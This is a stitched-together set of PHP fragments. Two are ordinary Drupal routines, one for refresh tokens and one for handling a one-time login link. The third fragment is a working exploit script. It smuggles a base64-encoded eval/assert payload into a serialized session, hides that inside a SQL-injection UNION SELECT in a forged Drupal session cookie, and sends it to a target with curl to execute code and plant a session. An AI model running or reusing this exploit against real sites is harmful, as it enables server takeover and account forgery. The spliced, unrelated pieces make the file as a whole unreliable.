/** * Create a refresh token for the current user * * It will delete all the existing refresh tokens for that same user as well. * * @param int $uid * The user ID. * * @return \RestfulTokenAuth * The token entity. */ private function generateRefreshToken($uid) { // Check if there are other refresh tokens for the user. $query = new \EntityFieldQuery(); $results = $query ->entityCondition('entity_type', 'restful_token_auth') ->entityCondition('bundle', 'refresh_token') ->propertyCondition('uid', $uid) ->execute(); if (!empty($results['restful_token_auth'])) { // Delete the tokens. entity_delete_multiple('restful_token_auth', array_keys($results['restful_token_auth'])); } // Create a new refresh token. $values = array( 'uid' => $uid, 'type' => 'refresh_token', 'created' => REQUEST_TIME, 'name' => t('Refresh token for: @uid', array( '@uid' => $uid, )), 'token' => drupal_random_key(), ); $refresh_token = $this->create($values); $this->save($refresh_token); return $refresh_token; }
/** * This is called when an interactive authentication attempt succeeds. This * is called by authentication listeners inheriting from * AbstractAuthenticationListener. * * @param Request $request * @param TokenInterface $token * * @return Response never null */ public function onAuthenticationSuccess(Request $request, TokenInterface $token) { list(, $timestamp, ) = $token->getCredentials(); $user = $token->getUser(); $account = $user->getDrupalUser(); watchdog('user', 'User %name used one-time login link at time %timestamp.', array('%name' => $account->name, '%timestamp' => $timestamp)); drupal_set_message(t('You have just used your one-time login link. It is no longer necessary to use this link to log in. Please change your password.')); // Let the user's password be changed without the current password check. $token = drupal_random_key(); $_SESSION['pass_reset_' . $account->uid] = $token; $qs = http_build_query(array('pass-reset-token' => $token), '', '&'); return new RedirectResponse('/user/' . $account->uid . '/edit?' . $qs); }
$code_inject = str_replace('<' . '?', '', str_replace('<' . '?php', '', str_replace('?' . '>', '', file_get_contents($code)))); } else { $code_inject = $code; } } $code_inject = rtrim($code_inject, ';'); $code_inject .= ';session_destroy();die("");'; if (strpos($url, 'www.') === 0) { $url = substr($url, 4); } $_SESSION = array('a' => 'eval(base64_decode("' . base64_encode($code_inject) . '"))', 'build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert'); $_SESSION['build_info']['args'][0] =& $_SESSION['string']; list(, $session_name) = explode('://', $url, 2); // use insecure cookie with sql inj. $cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32); $password = user_hash_password('test'); $session_id = drupal_random_key(); $sec_ssid = drupal_random_key(); $serial = str_replace('}', 'CURLYCLOSE', str_replace('{', 'CURLYOPEN', "batch_form_state|" . serialize($_SESSION))); $inject = "UNION SELECT {$user_id},'{$user_name}','{$password}','','','',null,0,0,0,1,null,'',0,'',null,{$user_id},'{$session_id}','','127.0.0.1',0,0,REPLACE(REPLACE('" . $serial . "','CURLYCLOSE',CHAR(" . ord('}') . ")),'CURLYOPEN',CHAR(" . ord('{') . ")) -- "; $cookie = $cookieName . '[test+' . urlencode($inject) . ']=' . $session_id . '; ' . $cookieName . '[test]=' . $session_id . '; S' . $cookieName . '=' . $sec_ssid; $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, True); curl_setopt($ch, CURLOPT_RETURNTRANSFER, True); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, False); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0'); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: en-US,en;q=0.5')); curl_setopt($ch, CURLOPT_COOKIE, $cookie); $output = curl_exec($ch); curl_close($ch); echo $output;